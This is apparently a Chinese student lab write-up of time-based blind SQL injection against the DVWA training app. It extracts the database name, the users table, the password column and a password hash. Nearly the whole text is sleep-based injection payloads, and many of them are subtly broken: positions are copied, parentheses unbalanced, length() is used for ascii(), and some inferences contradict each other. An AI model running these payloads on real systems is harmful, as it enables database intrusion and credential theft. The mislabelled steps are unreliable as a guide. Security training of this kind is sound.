- 实验目的:
时间盲注,获取users表中用户Smithy 的密码
- 实验准备:
在虚拟机window10中打开xampp,启动Apache和Mysql。在浏览器中打开并登录dvwa网站,单机右侧菜单-dvwa security,选择级别low
- 实验步骤:
- 判断注入点
判断有注入点
- 判断注入类型
已知:注入类型有数字型,字符型;
- 数字型
1 and sleep(5)-----页面不存在延迟
- 字符型
1’ and sleep(5)#-----页面存在延迟
由上可知:注入类型为字符型
- 获取数据库名
- 获取数据库名的长度
1’ and if(length(database())=4,sleep(5),1)#----页面存在延迟
由上可知:数据库名长度为4
- 猜解每一个字符
- 猜解第一个字符
1’ and if(ascii(substr(database(),1,1))>96),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))>106),sleep(5),1)#----页面不存在延迟
1’ and if(ascii(substr(database(),1,1))<101),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))<99),sleep(5),1)#----页面不存在延迟
1’ and if(ascii(substr(database(),1,1))=100),sleep(5),1)#----页面存在延迟----对照ascii 码表可知100为d
由上可知:第一个字符为d
- 猜解第二个字符
1’ and if(ascii(substr(database(),1,1))>96),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))>106),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))>116),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))<122),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))<119),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))=118),sleep(5),1)#----页面存在延迟----对照ascii 码表可知118为v
由上可知:第二个字符为v
- 猜解第三个字符
1’ and if(ascii(substr(database(),1,1))>96),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))>106),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))>116),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))<122),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))<119),sleep(5),1)#----页面不存在延迟
1’ and if(ascii(substr(database(),1,1))=119),sleep(5),1)#----页面存在延迟----对照ascii 码表可知118为w
由上可知:第三个字符为w
- 猜解第四个字符
1’ and if(ascii(substr(database(),1,1))>96),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))>106),sleep(5),1)#----页面不存在延迟
1’ and if(ascii(substr(database(),1,1))<101),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))<97),sleep(5),1)#----页面存在延迟
1’ and if(ascii(substr(database(),1,1))=97),sleep(5),1)#----页面不存在延迟
1’ and if(ascii(substr(database(),1,1))=96),sleep(5),1)#----页面存在延迟----对照ascii 码表可知118为a
由上可知:第四个字符为a
综上可得:数据库名为dvwa
- 获取数据表名
已知:users表在tables表中的第二行
- 获取数据库中数据表的个数
1’ and If((select count(table_name) from information_schema.tables where table_schema=’dvwa’ )=2,sleep(5),1)#-----页面存在延迟
由上可知:数据库中有两个表
- 获取第二个数据表的记录
select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1
- 获取第二个数据表名的完整字段
substr((select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),1)
- 获取第二个数据表名完整字段的长度
1’ and if((length(substr((select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),1))=5),sleep(5),1)#----页面存在延迟(题目已知表为users表,5个字段)
- 猜解数据表的每个字段
- 猜解第一个字段
1’ and If((substr(select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),1,1)=117),sleep(5),1)#-----页面存在延迟,对照ascii码表可知117对应u
- 猜解第二个字段
1’ and If((substr(select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),2,1)=115),sleep(5),1)#-----页面存在延迟,对照ascii码表可知115对应s
- 猜解第三个字段
1’ and If((substr(select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),3,1)=101),sleep(5),1)#-----页面存在延迟,对照ascii码表可知101对应e
- 猜解第四个字段
1’ and If((substr(select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),4,1)=114),sleep(5),1)#-----页面存在延迟,对照ascii码表可知114对应r
- 猜解第五个字段
1’ and If((substr(select table_name from information_schema.tables where table_schema=’dvwa’ limit1,1),5,1)=115),sleep(5),1)#-----页面存在延迟,对照ascii码表可知115对应s
综上可得:数据表名是users
5.获取字段名
- 获取users表中字段的个数
If(1' and (select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')=8,sleep(5),1)#
- 获取第5个字段名的长度
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),1))=8,sleep(5),1)#
- 猜解第5个字段名的每个字段
- 猜解第一个字断
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),1,1))=112,sleep(5),1)#-----页面延迟,对照ascii表可知为p
- 猜解第二个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),2,1))=97,sleep(5),1)#-----页面延迟,对照ascii表可知为a
- 猜解第三个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),3,1))=115,sleep(5),1)#-----页面延迟,对照ascii表可知为s
- 猜解第四个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),4,1))=115,sleep(5),1)#-----页面延迟,对照ascii表可知为s
- 猜解第五个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),5,1))=119,sleep(5),1)#-----页面延迟,对照ascii表可知为w
- 猜解第六个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),6,1))=111,sleep(5),1)#-----页面延迟,对照ascii表可知为o
- 猜解第七个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),7,1))=114,sleep(5),1)#-----页面延迟,对照ascii表可知为r
- 猜解第八个字段
1' and if(ascii(substr(select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),8,1))=100,sleep(5),1)#-----页面延迟,对照ascii表可知为d
综上可得:字段名为password
6.获取数据
已知:Smith位于第5行
- 获取数据的记录数
1' and if((select count(password) from dvwa.users)=5,sleep(5),1)#----页面存在延迟,说明记录数为5
- 获取第5条记录长度
1’ and if(length(substr((select password from dvwa.users limit 4,1),1))=32,sleep(5),1)#---页面延迟,说明数据长度为32
- 猜解每个字符
- 猜解第一个字符
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))<65,sleep(5),1)#----页面存在延迟---不为字母
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))<58,sleep(5),1)#----页面存在延迟--不为符号
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))>47,sleep(5),1)#----页面存在延迟---数字
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))>53,sleep(5),1)#----页面不存在延迟
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))=53,sleep(5),1)#----页面存在延迟---数字5
- 猜解第二个字符
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))<65,sleep(5),1)#----页面不存在延迟---不为数字
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))>96,sleep(5),1)#----页面存在延迟---为小写字母
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))>106,sleep(5),1)#----页面不存在延迟
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))>102,sleep(5),1)#----页面不存在延迟
1’ and if(length(substr((select password from dvwa.users limit 4,1),1,1))=102,sleep(5),1)#----页面存在延迟---f
以此类推得到密码为5f4dcc3b5aa765d61d8327deb882cf99
7.破解密码